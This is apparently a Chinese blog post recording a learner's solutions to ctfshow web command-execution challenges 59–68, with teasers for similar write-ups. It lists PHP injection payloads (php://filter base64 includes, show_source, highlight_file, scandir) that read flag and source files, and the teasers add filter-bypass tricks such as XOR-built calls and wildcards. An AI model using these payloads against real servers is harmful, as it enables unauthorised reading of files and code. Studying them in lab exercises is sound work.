ctfshow学习记录-web入门(命令执行59-68)

已于 2022-08-11 11:51:01 修改
阅读量375 收藏
点赞数 1
分类专栏: ctf-web # ctfshow-web 文章标签: 学习 web安全
于 2022-06-13 16:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48780534/article/details/125095507
版权

目录

web59-65

解答:payload和web58一样。
payload1:c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2:c=show_source('flag.php');

payload3:?c=file_get_contents('flag.php');

web66

解答:show_source也被阻了,base64可以,不过flag没在flag.php里。
在这里插入图片描述

#查找flag的位置,打印目录:print_r(scandir("/"));
c=highlight_file('/flag.txt');
#或者
c=include "php://filter/read=convert.base64-encode/resource=/flag.txt";

web67

题目:题目显示的代码同web59

解答:​print_r被过滤了。
c=var_dump(scandir("/"));打印目录,然后用include或者高亮显示flag。

web68

题目:题目显示的代码同web59

解答:高亮highlight_file被过滤。

c=var_dump(scandir("/"));打印目录
c=include("/flag.txt");

或者用伪协议base64一下依旧可以。

九枕
关注
专栏目录
CTFshow 命令执行 web59
Kradress的博客
12-03 232
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
CTFshow 命令执行 web68
Kradress的博客
12-04 367
目录源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和require能执行文件中的代码,因为flag不是php代码,所以只能以文本的形式显示 题解 发现
ctfshow命令执行 web入门 web64-68
m0_62207170的博客
04-08 237
ctfshow命令执行 web入门 web64-68
ctfshow-web入门-命令执行web59-web65)
最新发布
Welcome To Myon'Blog !
06-30 287
都是使用 highlight_file 或者 show_source。
CTFshow web(php命令执行 68-71)
csjjjd的博客
02-13 1254
直接输出根目录的位置,然后查看源代码,发现flag位置为flag.txt。还是那句话,没看到flag在哪,那就优先找到flag位置。知道flag在根目录下面的flag.txt直接访问就好了。这里c=var_dump(scandir("/"));先把上题payload看看能不能白嫖啊。// 你们在炫技吗?
ctfshow web入门 命令执行web59-63
m0_62207170的博客
04-07 167
ctfshow web入门命令执行web59-63
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 891
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
[ctfshow]web入门——命令执行web118-web122+web124)
ShenZ的博客
02-28 3835
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 2008
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
ctfshow-web-命令执行,网络安全开发的基础知识
2401_83739727的博客
04-03 691
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTFshow web66 67 68 69 70 71
ChenD的学习笔记
11-13 1037
CTFshow web66 web67 web68 web69 web70 web71
CTFshow web(php命令执行 55-59
csjjjd的博客
02-12 1472
遇到这类题目解法比较固定,这类题目一个解法是无字母RCE,运用自增和异或相关脚本构造system ls的另外形式,比如:("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08"^"%60%7b");点击file模式,自己选择上传的文件,然后把名字写进去,最后Send就好。打开后变成POST,把网页复制然后点击Body,我的上一篇文章有介绍,建议可以去看看。// 你们在炫技吗?// 你们在炫技吗?直接上POSTman。// 还能炫的动吗?// 你们在炫技吗?
CTFshow web(php命令执行59-67)
csjjjd的博客
02-13 1281
我还是那句话:如果不知道对面过滤了啥,那就一个一个尝试。没错,又又又是那个payload,他还在输出!没错,又又又是那个payload,他还在输出!没错,又又又是那个payload,他还在输出!没错,又又又是那个payload,他还在输出!额,这波被制裁了,不能白嫖了,那就靠实力了!这里是文件包含然后再输出变量。// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?// 你们在炫技吗?
ctfshow--web--命令执行
whisper921的博客
02-11 3215
web29 可以看到过滤了flag字样 但我们可以通过通配符绕过flag,比如用fla?来表示flag 先用?c=system('ls');来观察该目录下存在的文件,发现了flag.php 然后使用?c=system('cp fla?.php 1.txt');将flag.php的内容配对到1.txt中 然后访问1.txt即可得到flag 得到flag web30 发现新过滤了system以及php这两个关键字 我们此时可以通过反引号```来代替system,继...
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 971
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
ctfshow-web命令执行(web61-77;118-124)(Updating)
m0_50268414的博客
11-30 2743
ctfshow-web命令执行(web61-77;118-124) 文章目录ctfshow-web命令执行(web61-77;118-124)web66 print\_r(scandir())与highlight\_file()web68 includeweb69 exit() web66 print_r(scandir())与highlight_file() 题目描述 show_source('flag.php'); 该语句被过滤 题解 POST传入c=print_r(scandir(’/’)); 获得
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 685
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow web入门命令执行
uuzfumo的博客
12-17 1135
命令执行姿势
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3762
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值